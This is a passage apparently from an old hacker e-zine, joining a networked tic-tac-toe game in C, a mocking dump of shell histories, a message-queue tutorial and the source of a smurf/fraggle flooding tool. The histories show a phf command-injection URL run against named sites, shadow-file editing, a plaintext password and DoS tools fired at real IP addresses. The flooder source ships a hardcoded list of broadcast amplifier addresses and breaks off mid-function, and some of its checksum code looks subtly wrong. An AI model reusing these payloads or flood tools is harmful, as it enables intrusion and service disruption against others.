sync_players(void); /* synchronize players */ int continue_ttt(void); int check(char xoro); /* check for winner */ void color_fix(int sig); /* signal handler */ void reset_ttt(void); /* reset the ttt grid */ /* global socket descriptors BADBADBAD! */ int sockfd, newsockfd, sfd; /* two dimensional array for phusttt grid */ char ttt[3][3] = {{'1','2','3'},{'4','5','6'},{'7','8','9'}}; /* player info struct */ struct players { char remote[10]; /* usernames */ char local[10]; int x_or_o; /* are we X or O? */ }player; /* duh */ int main(int argc, char *argv[]) { int arg; int cont = 1; signal(SIGKILL, color_fix); signal(SIGINT, color_fix); if(argc < 2) usage(argv[0]); while((arg=getopt(argc, argv, "i:lh")) != EOF) { switch(arg) { case 'i': /* initiate */ { printf("%splayername>%s%s ",BOLDWHITE,END,RED); scanf("%9s", player.local); initiate(getip(optarg)); while(cont == 1) { reset_ttt(); sync_players(); play_ttt(); cont = continue_ttt(); } close(sockfd); printf("%s", END); exit(0); } case 'l': /* listen */ { printf("%splayername>%s%s ",BOLDWHITE,END,RED); scanf("%9s", player.local); wait_for_connection(); while(cont == 1) { reset_ttt(); sync_players(); play_ttt(); cont = continue_ttt(); } close(sockfd); printf("%s", END); exit(0); } case 'h': { usage(argv[0]); } default: { usage(argv[0]); } } } return(0); } unsigned long getip(char *hostname) { struct hostent *he; if((he=gethostbyname(hostname)) == NULL) /* get that smaq */ { herror("gethostbyname"); printf("%s", END); exit(1); } return(inet_addr(inet_ntoa(*((struct in_addr *)he->h_addr)))); /* yuck. */ } void usage(char *name) { fprintf(stderr, "%s%sTCP/IP TIC TAC TOE by phusnikn@usa.net%s\n",BGRED,BLUE,END); fprintf(stderr, "%susage: %s -l [ listen for a connection ]\n",BLUE, name); fprintf(stderr, " %s -i < remote host > [ initiate a connection ]\n", name); fprintf(stderr, " %s -h [ help ]%s\n", name, END); exit(0); } void draw(void) { (void)system("clear"); printf("\n\n\n\n\n\n\n\n\n\n"); printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[0][0],RED,BLUE,ttt[0][1],RED,BLUE,ttt[0][2]); printf("\t\t\t %sÍÍÍÎÍÍÍÍÍÎÍÍÍ%s\n",RED,END); printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[1][0],RED,BLUE,ttt[1][1],RED,BLUE,ttt[1][2]); printf("\t\t\t %sÍÍÍÎÍÍÍÍÍÎÍÍÍ%s\n", RED, END); printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[2][0],RED,BLUE,ttt[2][1],RED,BLUE,ttt[2][2]); } int continue_ttt(void) { char c; printf("\n%s\t\t Play another game? (y)es/(n)o:%s%s ",BOLDWHITE,END,RED); scanf("%1s", &c); /* PLEEZE SEY YES !@# */ if(c == 'y' || c == 'Y') return(1); else return(0); } void reset_ttt(void) { ttt[0][0] = '1'; /* OINK */ ttt[0][1] = '2'; ttt[0][2] = '3'; ttt[1][0] = '4'; ttt[1][1] = '5'; ttt[1][2] = '6'; ttt[2][0] = '7'; ttt[2][1] = '8'; ttt[2][2] = '9'; } void initiate(unsigned long ip) { struct sockaddr_in remote; player.x_or_o = X; /* we are X */ bzero(&remote, sizeof(struct sockaddr_in)); remote.sin_family = AF_INET; remote.sin_port = htons(PORT); remote.sin_addr.s_addr = ip; if((sfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); printf("%s", END); exit(1); } printf("%s%sWaiting for player...%s\n",END,BOLDWHITE,END); if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct sockaddr)) == -1) { perror("connect"); printf("%s", END); close(sfd); exit(1); } send(sfd, player.local, sizeof(player.local), 0); recv(sfd, player.remote, sizeof(player.remote), 0); printf("%s%sConnection established with%s%s %s [ %s ]%s\n",END,BOLDWHITE,END,RED,player.remote ,inet_ntoa(remote.sin_addr.s_addr),END); sleep(2); } void wait_for_connection(void) { struct sockaddr_in remote; struct sockaddr_in local; int addrlen; player.x_or_o = O; /* we are O */ addrlen = sizeof(struct sockaddr_in); bzero(&remote, sizeof(struct sockaddr_in)); bzero(&local, sizeof(struct sockaddr_in)); local.sin_family = AF_INET; local.sin_port = htons(PORT); local.sin_addr.s_addr = INADDR_ANY; if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); printf("%s", END); exit(1); } if(bind(sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); printf("%s", END); close(sockfd); exit(1); } if(listen(sockfd, 1) == -1) { perror("listen"); printf("%s", END); close(sockfd); exit(1); } printf("%s%sWaiting for player...\n%s",END,BOLDWHITE,END); if((newsockfd=accept(sockfd, (struct sockaddr *)&remote, &addrlen)) == -1) { perror("accept"); printf("%s", END); close(sockfd); exit(1); } sfd = newsockfd; recv(sfd, player.remote, sizeof(player.remote), 0); send(sfd, player.local, sizeof(player.local), 0); printf("%s%sConnection established with %s%s%s [ %s ]%s\n",END,BOLDWHITE,END,RED, player.remote , inet_ntoa(remote.sin_addr.s_addr), END); sleep(2); } void x_input(void) { int coord; if(player.x_or_o == O) { recv(sfd, &coord, sizeof(coord), 0); x_plot(coord); draw(); return; } printf("\n"); printf("\t\t\t %s%sX>%s%s ",END,BOLDWHITE,END,RED); scanf("%d", &coord); /* d0nt LOSE !@#$ */ send(sfd, &coord, sizeof(coord), 0); x_plot(coord); draw(); return; } void o_input(void) { int coord; if(player.x_or_o == X) { recv(sfd, &coord, sizeof(coord), 0); o_plot(coord); draw(); return; } printf("\n"); printf("\t\t\t %s%sO>%s%s ",END,BOLDWHITE,END,RED); scanf("%d", &coord); send(sfd, &coord, sizeof(coord), 0); o_plot(coord); draw(); return; } void x_plot(int x_coord) { switch(x_coord) { case 1: if(ttt[0][0] == 'o' || ttt[0][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[0][0] = 'x'; break; case 2: if(ttt[0][1] == 'o' || ttt[0][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[0][1] = 'x'; break; case 3: if(ttt[0][2] == 'o' || ttt[0][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[0][2] = 'x'; break; case 4: if(ttt[1][0] == 'o' || ttt[1][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[1][0] = 'x'; break; case 5: if(ttt[1][1] == 'o' || ttt[1][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[1][1] = 'x'; break; case 6: if(ttt[1][2] == 'o' || ttt[1][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[1][2] = 'x'; break; case 7: if(ttt[2][0] == 'o' || ttt[2][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[2][0] = 'x'; break; case 8: if(ttt[2][1] == 'o' || ttt[2][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[2][1] = 'x'; break; case 9: if(ttt[2][2] == 'o' || ttt[2][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END); x_input(); } else ttt[2][2] = 'x'; break; } } void o_plot(int o_coord) { switch(o_coord) { case 1: if(ttt[0][0] == 'o' || ttt[0][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[0][0] = 'o'; break; case 2: if(ttt[0][1] == 'o' || ttt[0][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[0][1] = 'o'; break; case 3: if(ttt[0][2] == 'o' || ttt[0][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[0][2] = 'o'; break; case 4: if(ttt[1][0] == 'o' || ttt[1][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[1][0] = 'o'; break; case 5: if(ttt[1][1] == 'o' || ttt[1][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[1][1] = 'o'; break; case 6: if(ttt[1][2] == 'o' || ttt[1][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[1][2] = 'o'; break; case 7: if(ttt[2][0] == 'o' || ttt[2][0] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[2][0] = 'o'; break; case 8: if(ttt[2][1] == 'o' || ttt[2][1] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[2][1] = 'o'; break; case 9: if(ttt[2][2] == 'o' || ttt[2][2] == 'x') { printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END); o_input(); } else ttt[2][2] = 'o'; break; } } void sync_players(void) { char buf[7]; if(player.x_or_o == X) { send(sfd, "sync", 5, 0); recv(sfd, buf, sizeof(buf), 0); if(strcmp("synced", buf) != 0) { fprintf(stderr, "%sCouldn't sync!%s\n", BOLDWHITE, END); close(sfd); exit(1); } } if(player.x_or_o == O) { recv(sfd, buf, sizeof(buf), 0); if(strcmp("sync", buf) != 0) { fprintf(stderr, "%sCouldn't sync!%s\n", BOLDWHITE, END); close(sfd); exit(1); } send(sfd, "synced", 7, 0); } } void play_ttt(void) { int c = 0; draw(); for(;;) { x_input(); if(check('x')) return; c++; /* heh */ if(c==9) { return; } o_input(); if(check('o')) return; c++; /* heh? */ if(c==9) { return; } } } int check(char xoro) /* sorta sounds like porno */ { int blah; if(xoro=='x') blah = X; if(xoro=='o') blah = O; if(ttt[0][0]==xoro && ttt[0][1]==xoro && ttt[0][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); /* bewm */ } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[1][0]==xoro && ttt[1][1]==xoro && ttt[1][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[2][0]==xoro && ttt[2][1]==xoro && ttt[2][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[0][0]==xoro && ttt[1][0]==xoro && ttt[2][0]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[0][1]==xoro && ttt[1][1]==xoro && ttt[2][1]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[0][2]==xoro && ttt[1][2]==xoro && ttt[2][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[0][0]==xoro && ttt[1][1]==xoro && ttt[2][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } if(ttt[2][0]==xoro && ttt[1][1]==xoro && ttt[0][2]==xoro) { if(player.x_or_o==blah) { printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END); return(1); } printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END); return(1); } return(0); } void color_fix(int sig) { printf("%s\n", END); close(sfd); exit(0); } !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 14 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b #hackphreak bash_history by jnz Hi. below are various .bash_history's from the official hackphreak box, doobie. This is where all the cool hackphreak ops have their shells and work on their various projects. some insignificant non-funny stuff edited out. enjoy, comments in "[]" accipiter: lynx www.army.mil lynx www.army.mil/cgi-bin/phf/?Qalias=x%0aid [fjear.] logout lynx www.unitedskins.org/cgi-bin/phf/?Qalias=x%0aid lynx www.unitedskins.com/cgi-bin/phf/?Qalias=x%0aid lynx w BitchX passwd 1q2w3e4r [that pazz still werks heh] passwd accip 1q2w3e4r BitchX pico /etc/shadow pico /etc/passwd lynx www.coberco.nl/_vti_pvt/ telnet www.coberco.nl telnet www.coberco.nl 23 gerbil: gcc -o land land.c [this is the guy that accuses everyone of nuking him] perhillio: [all these guys are hackpheak ops, i thought it said no nuking?] rz cc -O2 -o brkill brkill.c -lpcap ls gcc -o brkill brkill.c rm brkill.c gcc -O2 targa.c -o targa rm targa.c w ls gcc -DLINUX -o smurf5 papasmurf.c ls ./smurf5 ./smurf5 2.2.2.2 24.64.124.14 ./smurf5 24.64.124.14 ./smurf5 24.64.124.14 /eggdrop1.3.22/eggdrop ./smurf5 24.64.124.14 /home/perhill/eggdrop1.3.22/eggdrop [ugh.] rm smurf5 ls telnet ameri-cana.com telnet p1mp1n.ml.org sektorgrl: ncftp ocalafl-ts-1-14-atlantic.net ftp ocalafl-ts-1-14-atlantic.net gcc -o BitchX bitchx.c locate ip_udp.h rm bitchx.c id mkdir tmp mount cs.dit.ac.kr:/home1 tmp [enter eliteness.] venomous: ls smurf2 bmud ls qpop QPOP /exec qop exec qpop ls mail flair ls cat dead.letter qpop exec qpop ls ./qpop [venomous is a part of milw0rm. from here on he unleashes ./smurf2 milw0rm hacking trade secrets] ./bmud run .qpop run ./qpop rz ls gcc -O statd.c mdir make ls rm * rm bmud rm qpop rm QPOP ls rm make cd make ls chmod 700 z0ne ./make ls ./mscan virtua: pwd startx [lets startx on our shell. ] heh lilo -u c start x start c c+ mail irc mirc irc start irc mkdir hackingtextfiles cd hackingtextfiles cd hackingtextfiles cd hackingtextfiles ls pwd !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 15 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 A QUICK AND DIRTY INTRO TO MESSAGE QUEUES A message queue is a SySV IPC method. Like all IPC objects (methods, functions, whatever) the message queue is used to communicate with other processes. [Canul@/home/Canul/src/talkd/msgque 4:23pm]% man -k msg msgctl (2) - message control operations msgget (2) - get a message queue identifier msgop (2) - message operations recv, recvfrom, recvmsg (2) - receive a message from a socket send, sendto, sendmsg (2) - send a message from a socket (END) For you to make a message queue, just as in making a semaphore or a shared memory segment, you need a project identifier. This can be done by using the system call ftok. Ftok needs a pathname to work. SYNOPSIS #include #include key_t ftok (char *pathname, char proj) RETURN VALUE On success the return value will be the converted key_t value, otherwise -1 with errno. Then you can use msgget to get the message identifier using the key_ted valued returned from ftok. SYNOPSIS #include #include #include int msgget(key_t key, int msgflg) RETURN VALUE If successful, the return value will be the message queue identifier (a nonnegative integer), otherwise -1 with errno indicating. After you have the value of the message indentfier you can start sending and receving from it with the use of msgsnd and msgrcv, you can also change its permissions (perms) with msgctl. SYNOPSIS #include #include #include int msgsnd(int msqid, struct msgbuf *msgp", int msgsz, int msgflg) int msgrcv(int msqid, struct msgbuf *msgp, int msgsz, long msgtyp, int msgflg) DESCRIPTION To send or receive a message, the calling process allocates a structure that looks like the following struct msgbuf { long mtype; /* message type, must be > 0 */ char mtext[1]; /* message data */ }; msqid is the message identifier (the value that you should have gotten from msgget). msgsz is the size of the msgbuf minus the mtype (in pesudo-code long minus the sizeof msgbuf). Of course here msgbuf can be redefined, e.g in a header file, but when you pass the redefined structure to the function it must have the first element being a type long and the rest can be of any format and you must cast that structure as msgbuf. msgflg, well this flag you can usually leave to 0 but it is used for special requirements (try man msgop). In msgrcv te msgtyp field is to indicate what message from the message queue you would like to receive. This will be decided by the message's long mtype field, which always has to be positive number. The system call msgctl can be used to remove the message identifier and can also be used to change its perms. SYNOPSIS #include #include #include int msgctl(int msqid, int cmd, struct msqid_ds *buf) cmd can be either IPC_STAT; returns information of the message queue back to *buf, IPC_SET; changes the msgque (msg identifier) according to *buf, or IPC_RMID; removes the message identifier. [Canul@/usr/local/src/linux/include/linux 5:13pm]% more msg.h #ifndef _LINUX_MSG_H #define _LINUX_MSG_H #include /* ipcs ctl commands */ #define MSG_STAT 11 #define MSG_INFO 12 /* msgrcv options */ #define MSG_NOERROR 010000 /* no error if message is too big */ #define MSG_EXCEPT 020000 /* recv any msg except of specified type.*/ /* one msqid structure for each queue on the system */ struct msqid_ds { struct ipc_perm msg_perm; struct msg *msg_first; /* first message on queue */ struct msg *msg_last; /* last message in queue */ __kernel_time_t msg_stime; /* last msgsnd time */ __kernel_time_t msg_rtime; /* last msgrcv time */ __kernel_time_t msg_ctime; /* last change time */ struct wait_queue *wwait; struct wait_queue *rwait; unsigned short msg_cbytes; /* current number of bytes on queue */ unsigned short msg_qnum; /* number of messages in queue */ unsigned short msg_qbytes; /* max number of bytes on queue */ __kernel_ipc_pid_t msg_lspid; /* pid of last msgsnd */ __kernel_ipc_pid_t msg_lrpid; /* last receive pid */ }; With this you already know what msqid_ds holds. Here is some lame source that I wrote: # Bold Teeth Makefile CC= gcc CFLAGS= -Wall -g -O2 ALL= talk talkd all: ${ALL} clean: rm -rf talk talkd *~ talk: ${CC} ${CFLAGS} -o talk talk.c talkd: ${CC} ${CFLAGS} -o talkd talkd.c /* talkd.h by Canul */ #include #include #include #include #include #include #include #include #include #include #include #define VERSION "talkd v0.1 by Canul. canul7@yahoo.com" #define PATHNAME "." #define MAGICNUM 5400L #define DATA_LIMIT 1024 #define TIME_TO_SLEEP 5 struct passwd *checker; struct pak { long header; char data[DATA_LIMIT]; }; struct mymsgbuf { long mtype; struct pak bata; }; int msgsz = sizeof(struct mymsgbuf) - sizeof(long); /* * $Id: talk.c,v 0.1 1999/1/10 17:53:21 Canul Exp $ */ #include "talkd.h" int send_message(void); int get_message(void); int setup(void); struct mymsgbuf *dmsg; int qid; long myqid; void main(void) { char opt; if (setup()) { puts("there was an error setting up"); exit(1); } printf("Press the letter \"s\" to send a message or \"g\" to wait for a message.\n"); opt = fgetc(stdin); switch (opt) { case 's': if (send_message()) { puts("couldn't send the message"); exit(1); } break; case 'g': if (get_message()) { puts("couldn't receive message"); exit(1); } break; default: printf("%c unrecognized option\n", opt); break; } } int setup(void) { key_t key; if ((key = ftok(PATHNAME, 'a')) == -1) return 1; if ((qid = msgget(key, IPC_NOWAIT)) == -1) return 1; return 0; } int send_message(void) { int i, d; char *p; dmsg = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf)); dmsg->mtype = MAGICNUM; printf("enter long: "); scanf("%d", &d); dmsg->bata.header = (long *) d; printf("%ld is the header type\n", dmsg->bata.header); p = dmsg->bata.data; printf("Enter message: "); for (i = 0; i < DATA_LIMIT - 1; i++) { if ((*p = fgetc(stdin)) == EOF) break; p++; } *p = '\0'; printf("\nSending message to resource %d\n", qid); if (msgsnd(qid, (struct msgbuf *) dmsg, msgsz, 0) == -1) { perror("msgsnd"); return (1); } free(dmsg); return 0; } int get_message(void) { int d; dmsg = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf)); printf("enter message type: "); scanf("%d", &d); dmsg->bata.header = (long *) d; if ((msgrcv(qid, (struct msgbuf *) dmsg, msgsz, myqid, 0)) == -1) { perror("msgrcv"); return 1; } printf("Received: %s\n", dmsg->bata.data); free(dmsg); return 0; } /* * talkd.c this code is self-explanitory. (I hope) */ #include "talkd.h" #define LOG_PATH "log" int qid; struct mymsgbuf *msgp; void signalhandler(int a); void main(int argc, char **argv) { pid_t daemon; key_t key; FILE *fp; fp = fopen(LOG_PATH, "a"); msgp = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf)); signal(SIGTERM, signalhandler); puts(VERSION); if ((key = ftok(PATHNAME, 'a')) == -1) { perror("stat"); exit(1); } if ((qid = msgget(key, IPC_CREAT | 0660)) == -1) { perror("mesgget"); exit(1); } if ((daemon = fork()) == -1) { perror("fork"); exit(1); } if (daemon) { exit(0); } setsid(); if ((daemon = fork()) == -1) { perror("fork"); exit(1); } else if (daemon) exit(0); /* * kill that parent! */ while (1) { if ((msgrcv(qid, (struct msgbuf *) msgp, msgsz, MAGICNUM, 0)) != -1) { msgp->mtype = msgp->bata.header; fprintf(fp, "server: msg to %d with mtype %ld\n", qid, msgp->mtype); if (msgsnd(qid, (struct msgbuf *) msgp, msgsz, 0) == -1) { perror("msgsnd"); exit(1); /* * do whatever */ } } else { perror("msgrcv"); exit(1); } } } void signalhandler(int a) { printf("caught ^C\n"); if ((msgctl(qid, IPC_RMID, NULL)) == -1) { perror("msgctl"); exit(1); } } !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 16 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b Fear Morpheus. Now. (comments in []s) #include #include #include #include #include #include #include #include #include #include #include #include #include #include char public[15]; char version[5] = "1.4"; char author[15] = "Morpheus"; /* define color variables */ char red[] = "\033[1;31m"; char dred[] = "\033[0;31m"; [ COLORZ fEAR ] char blue[] = "\033[1;34m"; char norm[] = "\033[0;37m"; char white[] = "\033[1;37m"; char dgrey[] = "\033[1;30m"; char cyan[] = "\033[0;36m"; #define PRIVATE /* undefine this for public releases */ #undef DEBUG /* Used for debuging purposes only */ struct pktinfo { int ps; int src; int dst; }; void banner(void); void bad_type(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *); unsigned short in_chksum(u_short *, int); unsigned short checksum (u_short *, int); void banner (void) { sprintf(public, "%sPUBLiC", blue); [ k-rad coloring ] fprintf(stderr, "\n%sTh%se %sJ%sa%sckH%sa%smm%se%sr %sby %s.o(%s%s%s)o.\n", dgrey, dred, dgrey, dred, dgrey, dred, dgrey, dred, dgrey, red, cyan, white, author, cyan); #ifdef PRIVATE sprintf(public,"%sPRiVaTE", red); #endif fprintf(stderr, "%sV%se%srs%sio%sn %s: %s%s %s[%s%s]%s\n\n", dgrey, dred, dgrey, dred, dgrey, red, cyan, version, dgrey, public, dgrey, norm); } void bad_type(void) { fprintf(stderr, "%sMust Choose Attack Type!\n\n%sType\n%s----\n" "%su %s = %s UDP\ni %s = %s ICMP\n\n%s", red, dgrey, cyan, red, cyan, red, cyan, red, norm); exit(-1); } void usage (char *prog) { fprintf(stderr, "%susage%s: %s%s %s<%stype%s> [%sb file%s] <%starget%s> <%snum packets%s> " "<%spacket delay%s> <%spacket size%s>" /* " [%ssrc port%s] [%sdest port%s]" */ "\n", dgrey, cyan, white, prog, cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan /* dgrey, cyan, dgrey, cyan, */ ); fprintf(stderr, "\n%snum packets of %s0%s constant flood\n" "src port of %s0%s for random\n" "%s[bc address]%s can also be used in " "place of %s[b file]%s for a single bcast%s\n\n", dgrey, red, dgrey, red, dgrey, red, dgrey, red, dgrey, norm); exit(-1); } void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip; struct icmphdr *icmp; [ can't even write hiz own smurf function? ] char *packet; [ tfreak iz going to be PISSED ] packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip = (struct iphdr *)packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest; ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 0; icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc (int ignored) { fprintf(stderr, "\n%sD%so%sn%se%s!%s\n\n", dgrey, red, dgrey, red, dgrey, norm); exit(1); } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p) { struct iphdr *ip; [ can't write own fraggle function? ] struct udphdr *udp; [ du0d the author iz going to piss himself ] char *packet; [ because we sure are! ] int r; packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); ip = (struct iphdr *)packet; udp = (struct udphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); /* ip header */ ip->protocol = IPPROTO_UDP; ip->saddr = sin->sin_addr.s_addr; ip->daddr = dest; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps); ip->ihl = 5; ip->frag_off = 0; ip->check = checksum((u_short *)ip, sizeof(struct iphdr)); /* udp header */ udp->len = htons(sizeof(struct udphdr) + p->ps); udp->dest = htons(p->dst); if (!p->src) udp->source = htons(rand()); else udp->source = htons(p->src); /* send it on its way */ r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps, 0, (struct sockaddr *) sin, sizeof(struct sockaddr_in)); if (r == -1) { fprintf(stderr, "\n%sSending packet%s", red, norm); exit(-1); } free(packet); /* free willy 2! */ } unsigned short checksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft--; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer); } int main (int argc, char *argv[]) { int i, n, s, uf = 0, delay, num, bcast2 = 1, cycle = 10, cmdcount = 1, jhtype = 0; struct sockaddr_in sin; struct hostent *he; struct pktinfo p; char buf[32], **bcastfile = malloc(1024), attack[3], usefile[5], singlebcast[32]; FILE *bfile; #ifdef PRIVATE /* Replies as of 6/5/98 - 246 90 107 134 */ char *bcast[] = { "207.229.16.0", "155.58.120.0", "206.39.75.255", "206.39.81.255", NULL }; #else char *bcast[] = { NULL }; #endif banner(); signal(SIGINT, ctrlc); if (argv[1] == NULL) bad_type(); else if ((*argv[1] == 'i') || (*argv[1] == 'u')) { jhtype++; if (*argv[1] == 'u') jhtype++; } else bad_type(); if (argc < 3) usage(argv[0]); sprintf(usefile, argv[++cmdcount]); if(usefile[0] == 'b') { if(usefile[1] == '\0') uf = 1; if((usefile[1] == 'c') && (usefile[2] == '\0')) uf = 2; } if(uf == 0) { if(bcast[0] == NULL) { fprintf(stderr, "%sI'm Sorry This Version is not a PRiVaTe version.\n" "%sIt does not include an internal address list.\n" "%sPlease use either the %sb %sor %sbc %soptions.\n" " %s-%sMorpheus%s\n\n", red, white, red, dgrey, red, dgrey, red, white, cyan, norm); exit(-1); } } if(uf == 1) { if((argc - ++cmdcount) < 5) usage(argv[0]); if ((bfile = fopen(argv[cmdcount++], "r")) == NULL) { fprintf(stderr, "%sopening broadcast file %s\n\n", red, norm); exit(-1); } n = 0; while (fgets(buf, sizeof buf, bfile) != NULL) { buf[strlen(buf) - 1] = 0; if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; bcastfile[n] = malloc(strlen(buf) + 1); strcpy(bcastfile[n], buf); n++; } bcastfile[n] = '\0'; fclose(bfile); if (!n) { fprintf(stderr, "%sError: No valid addresses in file!%s\n\n", red, norm); exit(-1); } } if(uf == 2) { if((argc - ++cmdcount) < 5) usage(argv[0]); if(isdigit(*argv[cmdcount])) strcpy(singlebcast, argv[cmdcount++]); } if ((argc - cmdcount) < 4) usage(argv[0]); if ((he = gethostbyname(argv[cmdcount])) == NULL) { fprintf(stderr, "%sCan't resolve hostname!%s\n\n", red, norm); exit(-1); } memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0); num = atoi(argv[++cmdcount]); delay = atoi(argv[++cmdcount]); if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) { fprintf(stderr, "%screating raw socket%s", red, norm); exit(-1); } p.ps = atoi(argv[++cmdcount]); cmdcount++; p.src = 0; p.dst = 53; if (jhtype == 1) { setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&bcast2, sizeof(bcast2)); memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); } else if (jhtype == 2) { if (argc >= cmdcount +1) p.src = atoi(argv[cmdcount++]); if (argc >= cmdcount +1) p.dst = atoi(argv[cmdcount++]); } #ifdef DEBUG printf("Debug Infomation\n----------------\n"); printf("Type = %d\nBcast = %d\n", jhtype, 